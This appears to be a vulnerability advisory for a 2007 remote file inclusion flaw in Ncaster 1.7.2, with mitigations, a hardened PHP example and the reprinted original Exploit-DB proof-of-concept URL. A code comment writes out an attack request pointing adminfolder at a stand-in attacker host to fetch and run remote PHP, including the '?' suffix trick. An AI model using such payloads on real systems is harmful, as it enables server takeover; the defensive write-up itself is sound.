Vendor: Ncaster
Product Name: Ncaster
Discovered by: k1n9k0ng
CVSS: 7.5 (HIGH)
Vulnerability type: Remote Code Execution (RCE)
CWE: 78
Affected versions: Ncaster 1.7.2 (from 1.7.2 to 1.7.2)
Patch Exists: NO
Related CWE: (none listed)
CPE: a:ncaster:ncaster:1.7.2
Metasploit: (none listed)
Other Scripts: (none listed)
Platforms Tested: (not stated)
Published: 2007

Ncaster 1.7.2 RCE Vulnerability

Ncaster 1.7.2 is vulnerable to remote code execution because admin/addons/archive/archive.php passes the 'adminfolder' variable, without any validation, straight into a PHP require() call: require("$adminfolder/sources/datelib.php"). On the PHP configurations this 2007-era script was written for, with register_globals enabled, the value of $adminfolder comes directly from the query string, and with allow_url_include enabled (allow_url_fopen on PHP older than 5.2) require() will fetch and execute a file from a URL. An attacker therefore supplies the URL of a PHP file they host, which is what the [shell] placeholder in the proof of concept below stands for, and the web server executes it with the privileges of the PHP process. Despite the CWE-78 classification in the record above, the defect is a remote file inclusion (CWE-98, improper control of the filename in a PHP include/require), not OS command injection; the impact, arbitrary PHP execution, is the same.

Mitigation:

No vendor patch is recorded for this issue, so the fix has to be applied to the installation itself. In archive.php, stop taking the admin folder from a variable the request can populate: hardcode it, or derive it from the script's own location with __DIR__, and in general never pass request-controlled strings to require/include unless they are first mapped through an allowlist and resolved to a path under a fixed base directory. In php.ini set register_globals=Off and allow_url_include=Off (allow_url_fopen=Off as well if nothing else needs it), which removes the preconditions for this and any similar inclusion bug in the same code base. Where the code cannot be changed, a web server or WAF rule that rejects requests to archive.php whose adminfolder parameter contains a URL scheme (http://, ftp://, php://, data:) or "../" blocks the published attack, but only as a stopgap.
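The vulnerable pattern beside a hardened replacement, as an added example; this is not Ncaster's own code. It assumes the directory layout implied by the proof-of-concept URL (archive.php under admin/addons/archive/ of the Ncaster root), and the constant and function names (NCASTER_ADMIN_DIR, resolve_admin_folder) are illustrative. The trailing "?" in the attack URL is the standard trick for discarding the "/sources/datelib.php" suffix that require() appends, and is not shown in the original advisory.

```php
<?php
// Added example (not Ncaster's code): the page's vulnerable require() and a
// hardened replacement. Requires PHP 7+ for dirname($path, $levels) and "??".

// ---- Vulnerable (Ncaster 1.7.2, archive.php) --------------------------------
// $adminfolder is never validated. With register_globals=On the request
//   archive.php?adminfolder=http://attacker.example/shell.txt?
// sets $adminfolder from the query string. The trailing "?" makes the
// appended "/sources/datelib.php" part of the remote query string, so with
// allow_url_include=On (allow_url_fopen on PHP < 5.2) require() fetches
// http://attacker.example/shell.txt and executes whatever PHP it contains.
//
//   require("$adminfolder/sources/datelib.php");

// ---- Hardened ---------------------------------------------------------------
// Refuse to run on a configuration that repopulates globals from the request.
// ini_get() returns false on PHP >= 5.4, where the directive no longer exists.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    die('register_globals must be Off');
}

// The admin folder is a property of the installation, not of the request:
// derive it from this file's location (admin/addons/archive -> admin).
define('NCASTER_ADMIN_DIR', dirname(__DIR__, 2));

// When choosing between several folders is unavoidable, map a request-supplied
// key to a directory through an allowlist, then confirm the resolved path stays
// under a fixed base. realpath() collapses "..", returns false for paths that
// do not exist and for URLs, so neither a remote value nor traversal can pass.
function resolve_admin_folder(string $key, string $base): string
{
    static $allowed = ['admin' => 'admin'];          // request key => directory
    if (!array_key_exists($key, $allowed)) {
        throw new InvalidArgumentException("unknown admin folder key '$key'");
    }
    $realBase = realpath($base);
    if ($realBase === false) {
        throw new RuntimeException('base directory does not exist');
    }
    $path = realpath($realBase . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($path === false
        || strncmp($path, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
        throw new RuntimeException('admin folder resolves outside the base directory');
    }
    return $path;
}

// Either approach yields a path the request cannot influence.
$adminfolder = NCASTER_ADMIN_DIR;
// Alternative when the folder must be selectable: key comes from the request,
// but only allowlisted keys resolve, and only to paths under the Ncaster root.
// $adminfolder = resolve_admin_folder($_GET['folder'] ?? 'admin', dirname(__DIR__, 3));

require $adminfolder . '/sources/datelib.php';
```

The first approach (a fixed path from __DIR__) is the right one for this script, since nothing about the archive add-on legitimately needs a caller-chosen admin directory. resolve_admin_folder() is shown for code that really must branch on a request value: the allowlist lookup is what prevents inclusion of arbitrary names, and the realpath() prefix check is a second line of defence in case the allowlist is later widened to something that contains "..". Note that the check compares against $realBase plus a separator, so a sibling directory whose name merely starts with the base name does not pass.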

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]